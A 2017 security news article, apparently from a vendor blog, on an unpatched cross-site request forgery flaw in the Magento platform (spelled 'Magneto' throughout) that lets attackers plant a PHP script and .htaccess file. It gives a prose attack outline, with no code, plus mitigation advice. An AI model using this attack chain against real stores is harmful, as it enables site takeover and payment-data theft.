April 17, 2017 By Douglas Bonderud 2 min read

Sales via e-commerce platforms are rising. In fact, Forbes noted the November and December 2016 totals alone equaled more than $110 billion worldwide. But growing technological adoption has also spurred cybercriminal activity, with attackers looking for any way to crack e-commerce security measures and steal payment data.

SecurityWeek explained one vulnerability in the popular e-commerce platform Magneto could do more than just draw cybercriminal interest: With effective execution, malicious actors could gain total control of targeted systems.

Informing the Public

DefenseCode first detected the vulnerability in November 2016, and then reported to Magneto using its bug bounty program. Although Magneto acknowledged the issue, no fix was forthcoming, and DefenseCode chose to make its discovery public.

So what’s the risk? CIO said it all starts with Vimeo. Using a built-in Magneto feature, users can add Vimeo video content to their e-commerce shop for an existing product. The platform grabs a preview image using a POST request — but it’s possible for attackers to change the command from POST to GET, paving the way for a cross-site request forgery (CSRF) attack by uploading an arbitrary file.

While these files aren’t allowed on Magneto-based e-commerce sites, they’re still saved to the site’s server, allowing attackers to easily identify the save location, then upload a malicious PHP script and an .htaccess file into the same directory. To execute the attack, fraudsters must convince any user with admin panel access to access a specially crafted webpage.

Also worth noting is that even low-privilege accounts can access the remote image retrieval function and execute the CSRF, which grants threat actors full access to system databases and potentially full system control. This currently unpatched vulnerability puts more than 250,000 sites at risk.

Safeguarding Against the Vulnerability

So how do companies increase the security of their e-commerce site? Ideally, a fix is forthcoming for the Magneto issue, which will shut down at least one potential avenue of attack. But the value of e-commerce data means that cybercriminals are constantly looking for new ways to bypass defenses or leverage seemingly innocuous functions to gain complete control.

Multichannel Merchant explained it’s critical for companies to proceed with caution and assume all traffic heading to their website is potentially malicious. This means using SSL to encrypt legitimate transactions, properly sanitizing incoming data and always using active monitoring solutions to detect emerging threats such as fileless ransomware and cross-platform malware.

The Magneto problem also highlighted the ongoing challenge of user impact in retail IT security: While code vulnerabilities make it possible for attackers to inject malicious files, it still takes user action to actually execute an attack. To stay safe, businesses should restrict the number of users with administrative access to the bare minimum, making it easier to prevent attacks and detect problems if they emerge.

It’s also a good idea to regularly remind users of potential risk. For those with the right permissions, simply visiting compromised websites may be enough to jeopardize e-commerce data.

The newly public Magneto flaw poses serious risk for e-commerce stores. With no fix available, security researchers recommended that IT administrators both enable the “Add Secret Keys to URLs” function and disallow .htacess files in specific directories. It’s not a perfect solution, but with billions in revenue on the line and attackers drawn to any weakness, it’s worth repelling them wherever and whenever possible.

More from

How to craft a comprehensive data cleanliness policy

3 min read - Practicing good data hygiene is critical for today’s businesses. With everything from operational efficiency to cybersecurity readiness relying on the integrity of stored data, having confidence in your organization’s data cleanliness policy is essential.But what does this involve, and how can you ensure your data cleanliness policy checks the right boxes? Luckily, there are practical steps you can follow to ensure data accuracy while mitigating the security and compliance risks that come with poor data hygiene.Understanding the 6 dimensions of…

2024 roundup: Top data breach stories and industry trends

3 min read - With 2025 on the horizon, it’s important to reflect on the developments and various setbacks that happened in cybersecurity this past year. While there have been many improvements in security technologies and growing awareness of emerging cybersecurity threats, 2024 was also a hard reminder that the ongoing fight against cyber criminals is far from over.We've summarized this past year's top five data breach stories and industry trends, with key takeaways from each that organizations should note going into the following…

Black Friday chaos: The return of Gozi malware

4 min read - On November 29th, 2024, Black Friday, shoppers flooded online stores to grab the best deals of the year. But while consumers were busy filling their carts, cyber criminals were also seizing the opportunity to exploit the shopping frenzy. Our system detected a significant surge in Gozi malware activity, targeting financial institutions across North America. The Black Friday connection Black Friday creates an ideal environment for cyber criminals to thrive. The combination of skyrocketing transaction volumes, a surge in online activity…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today